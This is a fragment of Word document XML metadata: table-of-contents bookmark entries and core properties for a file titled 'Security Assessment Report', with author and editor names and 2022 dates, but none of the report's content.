      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402729</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>170</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402728</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114160</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>164</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402727</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048624</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>158</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402726</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245232</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>152</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402725</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179696</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>146</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402724</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376304</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>140</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402723</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310768</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>134</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402722</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507376</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402721</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441840</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>122</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402720</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>116</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402719</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>110</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402718</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>104</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402717</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048627</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>98</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402716</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245235</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>92</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402715</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179699</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402714</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376307</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>80</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402713</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310771</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>74</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402712</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507379</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>68</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402711</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441843</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402710</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031666</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402709</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966130</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402708</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114162</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402707</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048626</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402706</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245234</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402705</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402704</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376306</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402703</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402702</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402701</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc46402700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Security Assessment Report</dc:title>
  <dc:subject/>
  <dc:creator>Don Evatt, PhD</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Acuna, Chris (Analytics and Decision Support)</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-27T01:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-01T02:38:00Z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0x010100B7FBF0B9CEACA34A981A7F46EA19F3F9</vt:lpwstr>
  </property>
</Properties>
</file>